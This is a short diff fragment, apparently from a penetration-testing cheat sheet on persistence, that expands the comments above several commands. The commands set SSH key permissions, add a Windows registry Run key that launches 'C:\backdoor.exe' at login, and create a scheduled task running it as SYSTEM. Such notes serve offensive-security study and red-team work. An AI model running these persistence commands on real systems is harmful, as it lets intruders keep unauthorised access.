 chmod 600 ~/.ssh/authorized_keys

-# Windows — registry run key
+# Windows — add a registry run key to execute on login

 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"

-# Windows — scheduled task
+# Windows — create a scheduled task to run as SYSTEM

 schtasks /create /tn "backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru System